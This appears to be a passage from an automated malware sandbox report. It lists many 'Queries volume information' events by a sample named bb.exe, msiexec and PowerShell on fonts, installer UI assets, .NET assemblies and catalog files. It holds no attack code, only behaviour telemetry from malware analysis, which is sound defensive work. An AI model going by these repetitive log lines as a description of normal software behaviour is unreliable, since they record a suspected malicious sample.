            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\background VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\applogo.png VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\aboutbtn VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\buttonimgs VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\background VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\custominstallbtn VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\applogo.png VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\checkboximgs VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\aboutbtn VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\ProgressImage.png VolumeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
